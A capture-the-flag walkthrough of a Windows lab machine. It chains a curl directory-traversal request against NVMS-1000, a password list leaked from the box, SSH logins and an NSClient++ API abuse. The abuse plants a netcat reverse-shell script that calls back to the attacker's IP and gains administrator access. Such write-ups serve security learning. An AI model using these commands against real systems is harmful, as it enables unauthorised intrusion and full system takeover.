- OS: Windows
- Difficulty: Easy
- Points: 20
- Release: 11 Apr 2020
- IP: 10.10.10.184
Lets start by running nmap
nmap -sC -sV -oN nmap/nmap 10.10.10.184
FTP is running and allows anonymous login. There are two users listed on the FTP server, Nadine and Nathan. We also find tome text files, “Notes to do”.txt and Confidential.txt
Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards Nadine
The webserver is running NVMS-1000, searching for exploits we find CVE:2019-20085 which is a directory traversal. We can use this to find the passwords.txt that the note told us about.
curl --path-as-is -G http://10.10.10.184/../../../../../../../../Users/Nathan/Desktop/passwords.txt
This gives us a list of passwords
1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe L1k3B1gBut7s@W0rk 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$
We can try SSH with these passwords against both known users. The password L1k3B1gBut7s@W0rk works with Nadine.
We log in as Nadine and find User.txt on the Desktop.
This part took me a long time to do, mostly due to the GUI interface. I eventually done it using the web API.
Port 8443 is running NSClient++.
We can find the password for NSClient++ by going to C:\Program Files\NSClient++ and using the following command
nscp web --password --display Current password: ew2x6SsGTxjRwXOT
We can try logging in using this password but it will only allow connections from localhost. SSH has port forwarding built in so log in as Nadine with port forwarding enabled.
ssh -L 8443:127.0.0.1:8443 Nadine@10.10.10.184
Now we can use the web API to add a malicious script and execute it to gain root privileges.
First we need to upload nc.exe to C:/Temp. Then use the following command to add our script.
curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/evil.bat --data-binary "C:\Temp\nc.exe 10.10.14.33 9001 -e cmd.exe"
When run this will call back to our IP address. Set up a listener on the attacking machine.
nc -lvnp 9001
Then run the script
curl -s -k -u admin https://localhost:8443/api/v1/queries/evil/commands/execute?time=1m
This should connect back and give us root!
Root.txt is in C:\Users\Administrator\Desktop\root.txt